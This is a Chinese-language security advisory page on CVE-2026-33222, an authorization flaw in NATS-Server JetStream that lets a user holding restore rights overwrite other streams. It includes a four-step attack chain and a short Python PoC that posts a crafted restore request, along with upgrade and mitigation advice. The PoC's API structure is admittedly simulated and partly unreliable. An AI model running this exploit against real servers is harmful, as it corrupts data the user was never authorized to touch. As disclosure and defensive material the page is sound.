CVE-2026-33222 CVSS 4.9 中危

CVE-2026-33222 NATS-Server JetStream越权恢复漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33222

漏洞类型

越权漏洞

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

NATS-Server

漏洞概述

NATS-Server在2.11.15和2.12.6版本之前存在访问控制漏洞。拥有JetStream管理API恢复权限的用户可以利用该漏洞，将数据恢复到未授权的其他流名称中。这导致本应受保护的数据被篡改，违反了权限隔离原则。该漏洞CVSS评分为4.9，属于中危风险，需要高权限用户账号才能利用。

技术细节

该漏洞源于NATS-Server在处理JetStream API的流恢复请求时，缺乏对目标资源名称的严格校验。正常情况下，拥有特定流恢复权限的用户应仅能操作授权的流。然而，在受影响版本中，系统仅验证了用户是否具备执行“恢复”这一操作的能力，却未验证恢复操作的目标流名称是否在用户的授权许可范围内。攻击者可以通过构造恶意的API请求，将数据源恢复到其本无权访问的其他流中。这种逻辑缺陷属于典型的越权漏洞，主要破坏了数据的完整性（I:H），虽然需要高权限账号（PR:H），但攻击复杂度较低（AC:L）。

攻击链分析

STEP 1

步骤1：权限获取

攻击者获取一个拥有JetStream管理API访问权限的账号，该账号被分配了有限的流恢复权限。

STEP 2

步骤2：构造恶意请求

攻击者分析API端点，构造一个恢复请求，在请求中将目标流名称修改为无权访问的受保护流名称。

STEP 3

步骤3：执行越权恢复

服务器接收请求，由于校验逻辑缺陷，未检测目标流名称的授权情况，允许执行恢复操作。

STEP 4

步骤4：数据完整性破坏

受保护流的数据被攻击者的备份数据覆盖或篡改，导致业务逻辑错误或数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-33222
# This script demonstrates the logic flaw where a user with restore permissions
# can restore data to an arbitrary stream name.

import requests
import json

# Configuration
NATS_API_URL = "http://target-nats-server:8222/js/v1/stream"
AUTH_HEADER = {"Authorization": "Bearer <attacker_jwt_token>"}

# Legitimate source stream the attacker has access to
source_stream = "ATTACKER_OWNED_STREAM"

# Target stream the attacker wants to overwrite (Impacted data)
target_stream = "PROTECTED_TARGET_STREAM"

# Payload to restore data (Simulating the API call structure)
payload = {
    "stream_name": target_stream,  # Vulnerability: The target is not validated against permissions
    "restore_action": "full_restore",
    "source": source_stream
}

print(f"[*] Attempting to restore data from '{source_stream}' to restricted stream '{target_stream}'...")

try:
    # The endpoint might differ depending on specific NATS configuration
    response = requests.post(f"{NATS_API_URL}/{source_stream}/restore", headers=AUTH_HEADER, json=payload)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Data restored to unauthorized stream.")
        print(f"[+] Response: {response.json()}")
    else:
        print(f"[-] Request failed (Status: {response.status_code})")
        print(f"[-] Response: {response.text}")

except Exception as e:
    print(f"[!] Error during exploit execution: {e}")

影响范围

NATS-Server < 2.11.15

NATS-Server < 2.12.6

防御指南

临时缓解措施

如果无法立即升级，建议开发人员暂时移除受限用户的JetStream恢复权限，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表